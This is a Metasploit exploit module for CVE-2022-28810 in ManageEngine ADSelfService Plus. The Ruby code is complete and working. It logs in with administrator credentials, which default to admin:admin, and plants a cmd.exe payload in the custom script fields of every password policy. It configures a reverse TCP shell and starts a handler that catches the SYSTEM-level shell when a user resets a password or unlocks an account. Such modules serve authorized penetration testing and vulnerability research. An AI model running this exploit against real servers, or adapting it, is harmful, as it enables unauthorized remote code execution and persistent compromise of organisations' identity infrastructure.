##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ManageEngine ADSelfService Plus Custom Script Execution',
        'Description' => %q{
          This module exploits the "custom script" feature of ADSelfService Plus. The
          feature was removed in build 6122 as part of the patch for CVE-2022-28810.
          For purposes of this module, a "custom script" is arbitrary operating system
          command execution.

          This module uses an attacker provided "admin" account to insert the malicious
          payload into the custom script fields. When a user resets their password or
          unlocks their account, the payload in the custom script will be executed.
          The payload will be executed as SYSTEM if ADSelfService Plus is installed as
          a service, which we believe is the normal operational behavior.

          This is a passive module because user interaction is required to trigger the
          payload. This module also does not automatically remove the malicious code from
          the remote target. Use the "TARGET_RESET" operation to remove the malicious
          custom script when you are done.

          ADSelfService Plus uses default credentials of "admin":"admin"
        },
        'Author' => [
          # Discovered and exploited by unknown threat actors
          'Jake Baines', # Analysis, CVE credit, and Metasploit module
          'Hernan Diaz', # Analysis and CVE credit
          'Andrew Iwamaye', # Analysis and CVE credit
          'Dan Kelley' # Analysis and CVE credit
        ],
        'References' => [
          ['CVE', '2022-28810'],
          ['URL', 'https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html'],
          ['URL', 'https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/']
        ],
        'DisclosureDate' => '2022-04-09',
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_CMD,
        'Privileged' => true, # false if ADSelfService Plus is not run as a service
        'Stance' => Msf::Exploit::Stance::Passive,
        'Targets' => [
          [
            'Windows Command',
            {
              'Arch' => ARCH_CMD,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/jjs_reverse_tcp'
              }
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 8888,
          'DisablePayloadHandler' => true,
          'JJS_PATH' => '..\\jre\\bin\\jjs.exe'
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/']),
      OptString.new('USERNAME', [true, 'The administrator username', 'admin']),
      OptString.new('PASSWORD', [true, 'The administrator user\'s password', 'admin']),
      OptBool.new('TARGET_RESET', [true, 'On the target, disables custom scripts and clears custom script field', false])
    ])
  end

  ##
  # Because this is an authenticated vulnerability, we will rely on a version string
  # for the check function. We can extract the version (or build) from selfservice/index.html.
  ##
  def check
    res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/selfservice/index.html'))
    unless res
      return CheckCode::Unknown('The target failed to respond to check.')
    end

    unless res.code == 200
      return CheckCode::Safe('Failed to retrieve /selfservice/index.html')
    end

    ver = res.body[/\.css\?buildNo=(?<build_id>[0-9]+)/, :build_id]
    if ver.nil?
      return CheckCode::Safe('Could not extract a version number')
    end

    if Rex::Version.new(ver) < Rex::Version.new('6122')
      return CheckCode::Appears("This determination is based on the version string: #{ver}.")
    end

    CheckCode::Safe("This determination is based on the version string: #{ver}.")
  end

  ##
  # Authenticate with the remote target. Login requires four steps:
  #
  # 1. Grab a CSRF token
  # 2. Post credentials to /ServletAPI/accounts/login
  # 3. Post credentials to /j_security_check
  # 4. Grab another CSRF token for authenticated requests
  #
  # @return a new CSRF token to use with authenticated requests
  ##
  def authenticate
    # grab a CSRF token from the index
    res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/authorization.do') })
    fail_with(Failure::Unreachable, 'The target did not respond') unless res
    fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') if res.get_cookies_parsed.empty? || res.get_cookies_parsed['HttpOnly, adscsrf'].empty?
    csrf_tok = res.get_cookies_parsed['HttpOnly, adscsrf'].to_s[/HttpOnly, adscsrf=(?<token>[0-9a-f-]+); path=/, :token]
    fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') unless csrf_tok

    # send the first login request to get the ssp token
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/ServletAPI/accounts/login'),
      'keep_cookies' => true,
      'vars_post' =>
      {
        'loginName' => datastore['USERNAME'],
        'domainName' => 'ADSelfService Plus Authentication',
        'j_username' => datastore['USERNAME'],
        'j_password' => datastore['PASSWORD'],
        'AUTHRULE_NAME' => 'ADAuthenticator',
        'adscsrf' => csrf_tok
      }
    })
    fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 200

    # send the second login request to get the sso token
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/j_security_check'),
      'keep_cookies' => true,
      'vars_post' =>
      {
        'loginName' => datastore['USERNAME'],
        'domainName' => 'ADSelfService Plus Authentication',
        'j_username' => datastore['USERNAME'],
        'j_password' => datastore['PASSWORD'],
        'AUTHRULE_NAME' => 'ADAuthenticator',
        'adscsrf' => csrf_tok
      }
    })
    fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 302

    # revisit authorization.do to complete authentication
    res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/authorization.do'), 'keep_cookies' => true })
    fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 200
    fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') if res.get_cookies_parsed.empty? || res.get_cookies_parsed['adscsrf'].empty?
    csrf_tok = res.get_cookies_parsed['adscsrf'].to_s[/adscsrf=(?<token>[0-9a-f-]+);/, :token]
    fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') unless csrf_tok

    print_good('Authentication successful')
    csrf_tok
  end

  ##
  # Triggering the payload requires user interaction. Using the default payload
  # handler will cause this module to exit after planting the payload, so the
  # module will spawn it's own handler so that it doesn't exit until a shell
  # has been received/handled. Note that this module is passive so it should
  # just be chilling quietly in the background.
  #
  # This code is largely copy/paste from windows/local/persistence.rb
  ##
  def create_multihandler(lhost, lport, payload_name)
    pay = framework.payloads.create(payload_name)
    pay.datastore['LHOST'] = lhost
    pay.datastore['LPORT'] = lport
    print_status('Starting exploit/multi/handler')

    # Set options for module
    mh = framework.exploits.create('multi/handler')
    mh.share_datastore(pay.datastore)
    mh.datastore['PAYLOAD'] = payload_name
    mh.datastore['EXITFUNC'] = 'thread'
    mh.datastore['ExitOnSession'] = true
    # Validate module options
    mh.options.validate(mh.datastore)
    # Execute showing output
    mh.exploit_simple(
      'Payload' => mh.datastore['PAYLOAD'],
      'LocalInput' => user_input,
      'LocalOutput' => user_output,
      'RunAsJob' => true
    )

    # Check to make sure that the handler is actually valid
    # If another process has the port open, then the handler will fail
    # but it takes a few seconds to do so.  The module needs to give
    # the handler time to fail or the resulting connections from the
    # target could end up on on a different handler with the wrong payload
    # or dropped entirely.
    Rex.sleep(5)
    return nil if framework.jobs[mh.job_id.to_s].nil?

    return mh.job_id.to_s
  end

  # The json policy blob that ADSSP provides us is not accepted by ADSSP
  # if we try to POST it back. Specifically, ADSP is very unhappy about all
  # the booleans using "true" or "false" instead of "1" or "0" *except* for
  # HIDE_CAPTCHA_RPUA which has to remain a boolean. Sounds unbelievable, but
  # here we are.
  def fix_adssp_json(json_hash)
    json_hash.map do |key, value|
      if value.is_a? Hash
        [key, fix_adssp_json(value)]
      elsif value.is_a? Array
        value = value.map do |array_val|
          if array_val.is_a? Hash
            array_val = fix_adssp_json(array_val)
          end
          array_val
        end
        [key, value]
      elsif key == 'HIDE_CAPTCHA_RPUA'
        [key, value]
      elsif value.is_a? TrueClass
        [key, 1]
      elsif value.is_a? FalseClass
        [key, 0]
      else
        [key, value]
      end
    end.to_h
  end

  def exploit
    csrf_tok = authenticate

    # Grab the list of configured policies
    policy_list_uri = normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getPolicyConfigDetails')
    print_status("Requesting policy list from #{policy_list_uri}")
    res = send_request_cgi({ 'method' => 'GET', 'uri' => policy_list_uri })
    fail_with(Failure::UnexpectedReply, 'Log in attempt failed') unless res.code == 200
    policy_json = res.get_json_document
    fail_with(Failure::UnexpectedReply, "The target didn't return a JSON body") if policy_json.nil?
    policy_details_json = policy_json['POLICY_DETAILS']
    fail_with(Failure::UnexpectedReply, "The target didn't have any configured policies") if policy_details_json.nil?

    # There can be multiple policies. This logic will loop over each one, grab the configuration
    # details, update the configuration to include our payload, and then POST it back.
    policy_details_json.each do |policy_entry|
      policy_id = policy_entry['POLICY_ID']
      policy_name = policy_entry['POLICY_NAME']
      fail_with(Failure::UnexpectedReply, 'Policy details missing name or id') if policy_id.nil? || policy_name.nil?

      print_status("Requesting policy details for #{policy_name}")
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getAPCDetails'),
        'vars_get' =>
        {
          'POLICY_ID' => policy_id
        }
      })
      fail_with(Failure::UnexpectedReply, 'Acquiring specific policy details failed') unless res.code == 200

      # load the JSON and insert (or remove) our payload
      specific_policy_json = res.get_json_document
      fail_with(Failure::UnexpectedReply, "The target didn't return a JSON body") if specific_policy_json.nil?
      fail_with(Failure::UnexpectedReply, "The target didn't contain the expected JSON") if specific_policy_json['SCRIPT_COMMAND_RESET'].nil?
      new_payload = "cmd.exe /c #{payload.encoded}"

      if datastore['TARGET_RESET']
        print_status('Disabling custom script functionality')
        specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '0'
        specific_policy_json['SCRIPT_COMMAND_RESET'] = ''
        specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '0'
        specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = ''
      else
        print_status('Enabling custom scripts and inserting the payload')
        specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '1'
        specific_policy_json['SCRIPT_COMMAND_RESET'] = new_payload
        specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '1'
        specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = new_payload
      end

      # fix up the ADSSP provided json so ADSSP will accept it o.O
      updated_policy = fix_adssp_json(specific_policy_json).to_json

      policy_update_uri = normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/setAPCDetails')
      print_status("Posting updated policy configuration to #{policy_update_uri}")
      res = send_request_cgi({
        'method' => 'POST',
        'uri' => policy_update_uri,
        'vars_post' =>
        {
          'APC_SETTINGS_DETAILS' => updated_policy,
          'POLICY_NAME' => policy_name,
          'adscsrf' => csrf_tok
        }
      })
      fail_with(Failure::UnexpectedReply, 'Policy update request failed') unless res.code == 200

      # spawn our own payload handler?
      if !datastore['TARGET_RESET'] && datastore['DisablePayloadHandler']
        listener_job_id = create_multihandler(datastore['LHOST'], datastore['LPORT'], datastore['PAYLOAD'])
        if listener_job_id.blank?
          print_error("Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.")
        end
      else
        print_good('Done!')
      end
    end
  end
end
